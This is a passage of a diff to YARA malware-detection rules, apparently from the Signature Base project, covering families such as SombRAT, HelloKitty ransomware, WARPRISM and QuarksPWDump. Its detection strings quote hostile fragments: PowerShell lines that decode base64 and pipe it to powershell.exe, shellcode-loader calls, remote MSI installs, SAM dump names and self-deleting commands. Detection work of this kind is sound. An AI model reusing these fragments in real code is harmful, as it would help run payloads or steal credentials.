+		$s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii
+		$s5 = "MM.exe" fullword ascii
+		$s6 = "network.proxy.ssl" fullword wide
+		$s7 = "PeekNamePipe" fullword ascii
+		$s8 = "Host: %ws:%d" fullword ascii
+		$s9 = "GET %dHTTP/1.1" fullword ascii
+		$s10 = "SCHANNEL.DLL" fullword ascii
 
 	condition:
-		7 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or 4 of ( $s* )
 }
-rule SIGNATURE_BASE_Casper_Included_Strings : FILE
+rule SIGNATURE_BASE_APT_UNC1151_Windowsinstaller_Silent_Installproduct_Macromethod : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
-		author = "Florian Roth (Nextron Systems)"
-		id = "34ba474d-0858-534a-8f32-db5a709e8814"
-		date = "2015-03-06"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Proofpoint Threat Research"
+		id = "9ae80d54-33b9-55d7-957f-0738243e089f"
+		date = "2021-07-28"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L60-L83"
+		reference = "Thttps://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc1151_ua.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8796f45e459747db6bc08f362db7b152242f9f5bda3b72ddfc739cc9dcdfc55f"
-		score = 50
+		logic_hash = "aec1bb992061fdf1abf5c1a61cf9ec9e54c1f13be36ceb84890b058ade273b70"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1561ece482c78a2d587b66c8eaf211e806ff438e506fcef8f14ae367db82d9b3"
+		hash2 = "a8fd0a5de66fa39056c0ddf2ec74ccd38b2ede147afa602aba00a3f0b55a88e0"
 
 	strings:
-		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
-		$a1 = "& SYSTEMINFO) ELSE EXIT"
-		$c1 = "domcommon.exe" wide fullword
-		$c2 = "jpic.gov.sy" fullword
-		$c3 = "aiomgr.exe" wide fullword
-		$c4 = "perfaudio.dat" fullword
-		$c5 = "Casper_DLL.dll" fullword
-		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 }
-		$c7 = "{4216567A-4512-9825-7745F856}" fullword
+		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
+		$s1 = ".UILevel = 2"
+		$s2 = "CreateObject(\"WindowsInstaller.Installer\")"
+		$s3 = ".InstallProduct \"http"
 
 	condition:
-		all of ( $a* ) or uint16( 0 ) == 0x5a4d and ( 1 of ( $c* ) )
+		$doc_header at 0 and all of ( $s* )
 }
-rule SIGNATURE_BASE_Casper_Systeminformation_Output
+rule SIGNATURE_BASE_Quarkspwdump_Gen
 {
 	meta:
-		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+		description = "Detects all QuarksPWDump versions"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
-		date = "2015-03-06"
+		id = "7de4f59e-6cf5-5ad7-ae1f-8532d9e80c9e"
+		date = "2015-09-29"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L85-L104"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quarkspwdump.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "83c6216bc3e7fadfe81b9bbaca7b14e3398e972f8298c99a8eb576a40e4b4e1b"
-		score = 70
+		logic_hash = "327235260076f97c29acc1ca997205d08ef55fad795594fe2268f1d8e666d636"
+		score = 80
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
+		hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
+		hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
+		hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
+		hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
+		hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
+		hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
 
 	strings:
-		$a0 = "***** SYSTEM INFORMATION ******"
-		$a1 = "***** SECURITY INFORMATION ******"
-		$a2 = "Antivirus: "
-		$a3 = "Firewall: "
-		$a4 = "***** EXECUTION CONTEXT ******"
-		$a5 = "Identity: "
-		$a6 = "<CONFIG TIMESTAMP="
+		$s1 = "OpenProcessToken() error: 0x%08X" fullword ascii
+		$s2 = "%d dumped" fullword ascii
+		$s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii
+		$s4 = "\\SAM-%u.dmp" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_1 : FILE
+rule SIGNATURE_BASE_MAL_RTF_Embedded_OLE_PE : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects a suspicious string often used in PE files in a hex encoded object stream"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c16f3abb-ac7e-5d5f-b8d7-b105cff3886e"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L11-L24"
+		id = "20044f08-9574-5baf-b91e-47613e490d62"
+		date = "2018-01-22"
+		modified = "2023-11-25"
+		reference = "https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_strings_in_ole.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad3018e6aa377b5032b04226ecb1e27b2cc7bc8294455ea51e426b5182ed7821"
-		score = 75
+		logic_hash = "054abb34ae84e02469d726809a6d8aa582ebad65dd8385de7800d3f5db7ee31c"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "09061c603a32ac99b664f7434febfc8c1f9fd7b6469be289bb130a635a6c47c0"
 
 	strings:
-		$s1 = "suprise.exe" fullword ascii
+		$a1 = "546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465" ascii
+		$a2 = "4b45524e454c33322e646c6c" ascii
+		$a3 = "433a5c66616b65706174685c" ascii
+		$m3 = "4d5a40000100000006000000ffff"
+		$m2 = "4d5a50000200000004000f00ffff"
+		$m1 = "4d5a90000300000004000000ffff"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint32be( 0 ) == 0x7B5C7274 and 1 of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_2 : FILE
+rule SIGNATURE_BASE_APT_UNC2447_MAL_SOMBRAT_May21_1 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects SombRAT samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8433216e-1189-568c-bd18-051fb1fec215"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L26-L39"
+		id = "78b46bed-4fd4-596f-bba7-12243f467af3"
+		date = "2021-05-01"
+		modified = "2023-01-07"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e31ade3690938fe0999423fbe446d9426e14abd01ebbada4eed8bddb1e2c9ea6"
+		logic_hash = "6f2572745cbd68c5f2be5c64b160d2513938daba6da57523012491acc63cfee4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "74eb592ef7f5967b14794acdc916686e061a43169f06e5be4dca70811b9815df"
+		hash1 = "61e286c62e556ac79b01c17357176e58efb67d86c5d17407e128094c3151f7f9"
+		hash2 = "99baffcd7a6b939b72c99af7c1e88523a50053ab966a079d9bf268aff884426e"
 
 	strings:
-		$s1 = "NO2-2016101902.exe" fullword ascii
+		$x1 = "~arungvc" ascii fullword
+		$s1 = "plugin64_" ascii
+		$s2 = "0xUnknown" ascii fullword
+		$s3 = "b%x.%s" ascii fullword
+		$s4 = "/news" ascii
+		$sc1 = { 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 73
+               00 2E 00 65 00 78 00 65 00 00 00 00 00 00 00 00
+               00 49 73 57 6F 77 36 34 50 72 6F 63 65 73 73 00
+               00 6B 00 65 00 72 00 6E 00 65 00 6C 00 33 00 32
+               00 00 00 00 00 00 00 00 00 47 00 6C 00 6F 00 62
+               00 61 00 6C 00 5C 00 25 00 73 }
+		$op1 = { 66 90 0f b6 45 80 32 44 0d 81 34 de 88 44 0d 81 48 ff c1 48 83 f9 19 72 e9 }
+		$op2 = { 48 8b d0 66 0f 6f 05 ?1 ?? 0? 00 f3 0f 7f 44 24 68 66 89 7c 24 58 41 b8 10 00 00 00 4c 39 40 10 4c 0f 42 40 10 48 83 78 18 08 }
+		$op3 = { 49 f7 b0 a0 00 00 00 42 0f b6 04 0a 41 30 44 33 fe 48 83 79 18 10 72 03 48 8b 09 33 d2 b8 05 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_3 : FILE
+rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_1 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99aa29cf-d962-5a3d-bd28-6486c40822bb"
-		date = "2017-02-03"
+		id = "c84b2430-dcf1-5a80-96a0-02d292ea386b"
+		date = "2021-05-01"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L41-L59"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L38-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6920febf177667610e3edb8ba88ec137d085a867c1d6a570d4785fcc9cc62d49"
+		logic_hash = "acc0ab5502d53c6e22c8650c29c5459a6106f33c398e4efcd963f54971a0c870"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee2e2937128dac91a11e9bf55babc1a8387eb16cebe676142c885b2fc18669b2"
+		hash1 = "02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851"
+		hash2 = "0e5f7737704c8f25b2b8157561be54a463057cd4d79c7e016c30a1cf6590a85c"
+		hash3 = "52dace403e8f9b4f7ea20c0c3565fa11b6953b404a7d49d63af237a57b36fd2a"
+		hash4 = "7be901c5f7ffeb8f99e4f5813c259d0227335680380ed06df03fb836a041cb06"
+		hash5 = "947e357bfdfe411be6c97af6559fd1cdc5c9d6f5cea122bf174d124ee03d2de8"
+		hash6 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
+		hash7 = "a147945635d5bd0fa832c9b55bc3ebcea7a7787e8f89b98a44279f8eddda2a77"
+		hash8 = "bade05a30aba181ffbe4325c1ba6c76ef9e02cbe41a4190bd3671152c51c4a7b"
+		hash9 = "c2498845ed4b287fd0f95528926c8ee620ef0cbb5b27865b2007d6379ffe4323"
+		hash10 = "dc007e71085297883ca68a919e37687427b7e6db0c24ca014c148f226d8dd98f"
+		hash11 = "ef614b456ca4eaa8156a895f450577600ad41bd553b4512ae6abf3fb8b5eb04e"
 
 	strings:
-		$s1 = "/svchost.exe" fullword ascii
-		$s2 = "RasTls.dll" fullword ascii
-		$s3 = "20160620.htm" fullword ascii
-		$s4 = "* $l&$" fullword ascii
-		$s5 = "dfjhmh" fullword ascii
-		$s6 = "/20160620.htm" fullword ascii
+		$xop1 = { 8b 45 08 8b 75 f4 fe 85 f7 fd ff ff 0f 11 44 05 b4 83 c0 10 89 45 08 83 f8 30 7c 82 }
+		$xop2 = { 81 c3 dc a9 b0 5c c1 c9 0b 33 c8 89 55 a0 8b c7 8b 7d e0 c1 c8 06 33 f7 }
+		$s1 = "select * from Win32_ShadowCopy" wide fullword
+		$s2 = "bootfont.bin" wide fullword
+		$s3 = "DECRYPT_NOTE.txt" wide fullword
+		$s4 = ".onion" wide
+		$sop1 = { 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 0f 11 45 ec }
+		$sop2 = { 56 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 }
+		$sop3 = { 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 }
 
 	condition:
-		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_4 : FILE
+rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_2 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b21961ee-d346-51d3-bacd-02554240162d"
-		date = "2017-02-03"
+		id = "82aaabc6-102a-512e-8c2a-4d6fda864c68"
+		date = "2021-05-01"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L61-L75"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L74-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8011497e7d061a9ebde06667e47b5cd9469a433e0be1401d70637e7ace8e8155"
+		logic_hash = "1eee3a00ab3f70425d2b6bf5dc507155bf504b851ddb6515602d83d8b6a254b8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9519d2624a842d2c9060b64bb78ee1c400fea9e43d4436371a67cbf90e611b8"
+		hash1 = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768"
+		hash2 = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9"
+		hash3 = "501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe"
+		hash4 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
 
 	strings:
-		$s1 = "Mcutil.dll" fullword ascii
-		$s2 = "mcut.exe" fullword ascii
+		$xop1 = { 50 8d 45 f8 50 ff 75 fc ff 15 ?? ?? 42 00 3d ea 00 00 00 75 18 83 7d f8 00 }
+		$s1 = "HelloKittyMutex" wide
+		$s2 = "%s\\read_me_lkd.txt" wide fullword
+		$s3 = "/C ping 127.0.0.1 & del %s" wide fullword
+		$s4 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword
+		$sop1 = { 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc ff 15 ?? ?? 42 00 }
+		$sop2 = { 74 12 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_5 : FILE
+rule SIGNATURE_BASE_APT_UNC2447_PS1_WARPRISM_May21_1 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects WARPRISM PowerShell samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2a7c6a36-aace-562e-bbc4-425c1d93fab1"
-		date = "2017-02-03"
+		id = "fa389a45-3b31-5a84-9882-49fd6ee8cac5"
+		date = "2021-05-01"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L77-L95"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L101-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fbc1a2e078cfae7a9c72612b9c769e84d8c1d59c89e05001571ad00071e38577"
+		logic_hash = "09abac2be0f12d31dabfdae9e8a148a28887a2a5df003c7bcb56ba45f1c6a62c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "74dd52aeac83cc01c348528a9bcb20bbc34622b156f40654153e41817083ba1d"
+		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
+		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
+		hash3 = "b41a303a4caa71fa260dd601a796033d8bfebcaa6bd9dfd7ad956fac5229a735"
 
 	strings:
-		$x1 = "dbozcb" fullword ascii
-		$s1 = "nflogger.dll" fullword ascii
-		$s2 = "/svchost.exe" fullword ascii
-		$s3 = "1207.htm" fullword ascii
-		$s4 = "/1207.htm" fullword ascii
+		$x1 = "if ($MyInvocation.MyCommand.Path -match '\\S') {" ascii fullword
+		$s1 = "[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr " ascii wide
+		$s2 = "[Runtime.InteropServices.Marshal]::Copy($" ascii wide
+		$s3 = "[System.Diagnostics.Process]::Start((-join(" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of them )
+		filesize < 5000KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_6 : FILE
+rule SIGNATURE_BASE_APT_UNC2447_BAT_Runner_May21_1 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects Batch script runners from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e3bb4bd-5e20-56e7-a82b-d717d83eaeeb"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L97-L111"
+		id = "0bacd4f7-421a-570f-9f74-5a19ab806dd0"
+		date = "2021-05-01"
+		modified = "2023-01-07"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L121-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2de78012cc384211cef6c12817fd8cef9d93eef6de3197d0cfec64c1a8022ae3"
+		logic_hash = "f9872327f648e4421aa40ca3ce55df5d3eb5e8c5bc718ff62a3d4adac79217eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a16078c6d09fcfc9d6ff7a91e39e6d72e2d6d6ab6080930e1e2169ec002b37d3"
+		hash1 = "ccacf4658ae778d02e4e55cd161b5a0772eb8b8eee62fed34e2d8f11db2cc4bc"
 
 	strings:
-		$s1 = "jGetgQ|0h9=" fullword ascii
-		$s2 = "\\sfxrar32\\Release\\sfxrar.pdb"
+		$x1 = "powershell.exe -c \"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::" ascii
+		$x2 = "wwansvc.txt')))\" | powershell.exe -" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_7 : FILE
+rule SIGNATURE_BASE_MAL_Crime_Win32_Rat_Parallax_Shell_Bin : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e9cdca86-84a8-5673-935c-c319b523674b"
-		date = "2017-02-03"
+		description = "Detects Parallax injected code"
+		author = "@VK_Intel"
+		id = "6bb337ef-3156-589a-9b2f-fa1b21699433"
+		date = "2020-05-05"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L113-L129"
+		reference = "https://twitter.com/VK_Intel/status/1257714191902937088"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rat_parallax.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87ab6cd5c769e7e38bef807fa7d15af3a66fed8fdb7fed49fa62d87e1049ceb4"
+		logic_hash = "6b8c71cc19ca6f066d27a4e58d9ec347ac51d245308f2c41adf2386242581610"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc2d47d91ad8517a4a974c4570b346b41646fac333d219d2f1282c96b4571478"
-
-	strings:
-		$s1 = "RasTls.dll" fullword ascii
-		$s2 = "RasTls.exe" fullword ascii
-		$s4 = "LOADER ERROR" fullword ascii
-		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		tlp = "white"
+
+	strings:
+		$ntdll_load = {55 8b ec 81 ec d0 08 00 00 53 56 57 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 33 c0 b9 18 01 00 00 f3 ?? 68 02 9f e6 6a e8 ?? ?? ?? ?? 8b d8 68 40 5e c0 84 89 ?? ?? e8 ?? ?? ?? ?? 6a 00 8b f0 68 0b 1c 64 72 53 89 ?? ?? e8 ?? ?? ?? ?? 83 c4 14 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 68 30 02 00 00 51 ff d0 6a 6e 58 6a 74 66 ?? ?? ?? ?? ?? ?? 58 6a 64 59 6a 6c 66 ?? ?? ?? ?? ?? ?? 58 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 33 c0 6a 2e}
+		$call_func = {81 ec bc 00 00 00 8d ?? ?? 56 50 6a 00 6a 01 ff ?? ?? e8 ?? ?? ?? ?? 8b f0 83 c4 10 85 f6 0f ?? ?? ?? ?? ?? 33 c9 89 ?? ?? 39 ?? ?? 0f ?? ?? ?? ?? ?? 8b ?? ?? 53 57 8b ?? ?? 8d ?? ?? 0f ?? ?? ?? 8b ?? ?? 8d ?? ?? 8b ?? ?? 03 fa 8b df 2b da 03 ?? ?? 80 ?? ?? 0f ?? ?? ?? ?? ?? 83 ?? ?? ?? 8b c7 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 99 89 ?? ?? 8b ca 89 ?? ?? 8d ?? ?? 99 89 ?? ?? 89 ?? ?? 8d ?? ?? 89 ?? ?? 89 ?? ?? 8b ca 99 89 ?? ?? 89 ?? ?? 8b ca 89 ?? ?? 89 ?? ?? 8d ?? ?? 6a 40 89 ?? ??}
+		$cryp_hex = {8b ec 8b ?? ?? 25 55 55 55 55 d1 e0 8b ?? ?? d1 e9 81 e1 55 55 55 55 0b c1 89 ?? ?? 8b ?? ?? 81 e2 33 33 33 33 c1 e2 02 8b ?? ?? c1 e8 02 25 33 33 33 33 0b d0 89 ?? ?? 8b ?? ?? 81 e1 0f 0f 0f 0f c1 e1 04 8b ?? ?? c1 ea 04 81 e2 0f 0f 0f 0f 0b ca 89 ?? ?? 8b ?? ?? c1 e0 18 8b ?? ?? 81 e1 00 ff 00 00 c1 e1 08 0b c1 8b ?? ?? c1 ea 08 81 e2 00 ff 00 00 0b c2 8b ?? ?? c1 e9 18 0b c1 89 ?? ?? 8b ?? ?? 5d c3}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		uint16( 0 ) == 0x5a4d and 2 of them or all of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_8 : FILE
+rule SIGNATURE_BASE_Telebots_Intercepterng : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects TeleBots malware - IntercepterNG"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9a4f092-c699-5e91-9667-64ffe1b02bc1"
-		date = "2017-02-03"
+		id = "f4d48eb6-8235-534d-a32f-7f2711b96e9d"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L131-L147"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1d5e72970919cd5c0493f8882cbc6fb1bb3c5b6517813a4022efd0028dfe728"
+		logic_hash = "cbf0d44d871ec471e891fb909612f58263ec0b0c702f87875f6e027362409318"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ef91c17b1415609a2394d2c6c353318a2503900e400aab25ab96c9fe7dc92ff"
